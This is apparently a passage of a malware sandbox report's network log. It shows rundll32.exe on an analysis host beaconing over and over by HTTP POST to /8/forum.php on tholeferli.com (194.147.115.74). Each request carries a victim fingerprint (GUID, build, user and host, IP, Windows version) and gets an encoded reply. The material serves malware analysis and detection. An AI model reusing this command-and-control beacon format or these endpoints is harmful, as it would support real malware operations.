Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: tholeferli.com
Content-Length: 110
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:15.616853952 CEST | 320 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 22 Jul 2021 14:11:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4d 4a 51 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cMJQNARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.22 | 49190 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:15.904902935 CEST | 321 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: tholeferli.com
Content-Length: 110
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:16.062848091 CEST | 321 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 22 Jul 2021 14:11:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4a 4b 50 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cJKPQARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
24 | 192.168.2.22 | 49191 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:16.376070976 CEST | 322 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: tholeferli.com
Content-Length: 110
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:16.542682886 CEST | 322 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 22 Jul 2021 14:11:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 46 43 58 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cFCXUARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
25 | 192.168.2.22 | 49192 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:16.824492931 CEST | 323 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: tholeferli.com
Content-Length: 110
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:17.994708061 CEST | 323 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 22 Jul 2021 14:11:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 41 5a 41 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cAZAZARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
26 | 192.168.2.22 | 49193 | 194.147.115.74 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 16:11:18.275527954 CEST | 324 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: tholeferli.com
Content-Length: 110
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
Jul 22, 2021 16:11:18.446471930 CEST | 324 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 22 Jul 2021 14:11:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cCAZXARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                27192.168.2.2249194194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:18.738598108 CEST | kBytes transferred: 325 | Direction: OUT | Data: POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:18.908724070 CEST | kBytes transferred: 326 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:18 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 48 53 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii (chunked body: size line "c", payload, terminating chunk "0"): ZHSAARRABw==


                                                Session ID: 28 | Source IP: 192.168.2.22 | Source Port: 49195 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:19.188211918 CEST | kBytes transferred: 326 | Direction: OUT | Data: POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:19.343904018 CEST | kBytes transferred: 327 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:19 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 4b 50 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii (chunked body: size line "c", payload, terminating chunk "0"): NKPMARRABw==


                                                Session ID: 29 | Source IP: 192.168.2.22 | Source Port: 49196 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:19.614252090 CEST | kBytes transferred: 328 | Direction: OUT | Data: POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:19.770859003 CEST | kBytes transferred: 328 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:19 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 43 58 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii (chunked body: size line "c", payload, terminating chunk "0"): QCXJARRABw==


                                                Session ID: 3 | Source IP: 192.168.2.22 | Source Port: 49170 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:05.626411915 CEST | kBytes transferred: 292 | Direction: OUT | Data: POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:05.795413971 CEST | kBytes transferred: 292 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:05 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 47 54 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii (chunked body: size line "c", payload, terminating chunk "0"): AGTZARRABw==


                                                Session ID: 30 | Source IP: 192.168.2.22 | Source Port: 49197 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:20.081789017 CEST | kBytes transferred: 329 | Direction: OUT | Data: POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:20.239052057 CEST | kBytes transferred: 329 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:20 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 5a 41 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii (chunked body: size line "c", payload, terminating chunk "0"): NZAMARRABw==


                                                Session ID: 31 | Source IP: 192.168.2.22 | Source Port: 49198 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:20.521209002 CEST | kBytes transferred: 330 | Direction: OUT | Data: POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:21.975286007 CEST | kBytes transferred: 330 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:21 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii (chunked body: size line "c", payload, terminating chunk "0"): ZMNAARRABw==


                                                Session ID: 32 | Source IP: 192.168.2.22 | Source Port: 49199 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:22.258954048 CEST | kBytes transferred: 331 | Direction: OUT | Data: POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:22.426027060 CEST | kBytes transferred: 331 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:22 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 51 4a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii (chunked body: size line "c", payload, terminating chunk "0"): GQJTARRABw==


                                                Session ID: 33 | Source IP: 192.168.2.22 | Source Port: 49200 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:22.720313072 CEST | kBytes transferred: 332 | Direction: OUT | Data: POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:22.876840115 CEST | kBytes transferred: 332 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:22 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii (chunked body: size line "c", payload, terminating chunk "0"): VZAEARRABw==


                                                Session ID: 34 | Source IP: 192.168.2.22 | Source Port: 49201 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:23.162344933 CEST | kBytes transferred: 333 | Direction: OUT | Data: POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:23.318594933 CEST | kBytes transferred: 333 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:23 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 56 45 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii (chunked body: size line "c", payload, terminating chunk "0"): GVETARRABw==


                                                Session ID: 35 | Source IP: 192.168.2.22 | Source Port: 49202 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:23.593628883 CEST | kBytes transferred: 334 | Direction: OUT | Data: POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:23.762403965 CEST | kBytes transferred: 335 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:23 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii (chunked body: size line "c", payload, terminating chunk "0"): ZMNAARRABw==


                                                Session ID: 36 | Source IP: 192.168.2.22 | Source Port: 49203 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:24.041052103 CEST | kBytes transferred: 335 | Direction: OUT | Data: POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:24.211648941 CEST | kBytes transferred: 336 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:24 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 43 58 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii (chunked body: size line "c", payload, terminating chunk "0"): FCXUARRABw==


                                                Session ID: 37 | Source IP: 192.168.2.22 | Source Port: 49204 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp: Jul 22, 2021 16:11:24.500588894 CEST | kBytes transferred: 336 | Direction: OUT | Data: POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Timestamp: Jul 22, 2021 16:11:24.672410011 CEST | kBytes transferred: 337 | Direction: IN | Data: HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:24 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 41 5a 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii (chunked body: size line "c", payload, terminating chunk "0"): JAZQARRABw==


